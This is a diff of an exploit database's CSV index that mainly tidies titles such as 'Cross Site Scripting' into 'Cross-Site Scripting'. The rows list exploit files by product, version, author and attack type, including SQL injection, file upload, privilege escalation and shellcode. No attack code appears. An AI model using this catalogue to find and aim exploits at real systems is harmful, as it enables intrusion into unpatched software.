- Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 & 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"PHPLIST 3.0.6 & 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 @@ -32126,7 +32126,7 @@ id,file,description,date,author,platform,type,port 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0 -35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - (.pj) Heab-based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 @@ -32136,7 +32136,7 @@ id,file,description,date,author,platform,type,port 35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl)",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion and SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 +35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 SQL Injection and Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 @@ -32148,57 +32148,57 @@ id,file,description,date,author,platform,type,port 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,php,webapps,0 35681,platforms/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",linux,local,0 -35682,platforms/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross Site Scripting",2011-04-30,"AutoSec Tools",php,webapps,0 -35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting",2011-05-02,"Patrick Webster",java,webapps,0 -35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross Site Scripting",2011-05-02,"AutoSec Tools",php,webapps,0 +35682,platforms/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross-Site Scripting",2011-04-30,"AutoSec Tools",php,webapps,0 +35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",java,webapps,0 +35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 selfserviceSaveOk Parameter Cross-Site Scripting",2011-05-02,"AutoSec Tools",php,webapps,0 35685,platforms/multiple/remote/35685.txt,"Asterisk 1.8.x SIP INVITE Request User Enumeration Weakness",2011-05-02,"Francesco Tornieri",multiple,remote,0 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 -35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 -35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 +35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 +35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload",2011-05-08,KedAns-Dz,php,webapps,0 35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack-Based Buffer Overflow",2011-05-09,KedAns-Dz,windows,remote,0 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,Metasploit,windows,local,0 -35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting",2011-05-03,Hector.x90,php,webapps,0 +35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 -35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 -35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 -35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 -35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",jsp,webapps,0 -35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0 +35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 +35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 +35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 +35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",jsp,webapps,0 +35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35709,platforms/php/webapps/35709.txt,"e107 0.7.25 - 'news.php' SQL Injection",2011-05-07,KedAns-Dz,php,webapps,0 35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80 35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0 -35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 -35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 +35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 +35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 - Local File Inclusion / Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 -35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 +35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 35721,platforms/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 -35725,platforms/multiple/dos/35725.pl,"Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 +35725,platforms/multiple/dos/35725.pl,"Perl 5.10 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 35726,platforms/php/webapps/35726.py,"GetSimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 -35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 +35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Auth Bypass and Arbitrary File Upload",2015-01-08,Metasploit,php,remote,80 +35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Auth Bypass / Arbitrary File Upload",2015-01-08,Metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS",2015-01-09,Technidev,php,webapps,80 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' Parameter SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 -35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 -35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 -35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0 +35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 +35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 +35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting and SQL Injection",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0 -35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 +35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0 35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0 @@ -32209,18 +32209,18 @@ id,file,description,date,author,platform,type,port 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0 35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - (Software Manager swmng.app) Privilege Escalation",2015-01-11,RichardG,linux,local,0 -35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 +35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service",2011-05-16,Knud,multiple,dos,0 -35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 -35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 -35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 +35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 +35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 +35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35757,platforms/php/webapps/35757.txt,"eFront 3.6.9 - 'scripts.php' Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 -35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross Site Scripting",2011-05-16,"John Leitch",php,webapps,0 -35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0 -35761,platforms/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Parameter Cross Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 +35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting",2011-05-16,"John Leitch",php,webapps,0 +35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0 +35761,platforms/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Parameter Cross-Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 iptm/advancedfind.do extn Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 iptm/ddv.do deviceInstanceName Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 @@ -32238,34 +32238,34 @@ id,file,description,date,author,platform,type,port 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 - Shell Upload",2015-01-13,Metasploit,php,remote,80 -35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 -35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 Common Services Device Center Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 +35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 +35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 -35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 +35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 -35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 +35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 -35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 +35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption",2011-05-24,"Andy Davis",multiple,remote,0 -35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0 -35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting",2011-05-24,"Kacper Szczesniak",multiple,remote,0 +35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0 +35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross-Site Scripting",2011-05-24,"Kacper Szczesniak",multiple,remote,0 35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0 35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 -35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection",2011-05-30,KedAns-Dz,php,webapps,0 +35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injection",2011-05-30,KedAns-Dz,php,webapps,0 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,php,webapps,0 35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0 -35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 +35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 -35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 +35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 -35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 -35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 +35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 +35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0 35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 @@ -32273,30 +32273,30 @@ id,file,description,date,author,platform,type,port 35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injection",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 -35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross Site Scripting and Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0 +35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0 35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 -35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 +35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 35823,platforms/php/webapps/35823.txt,"WordPress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 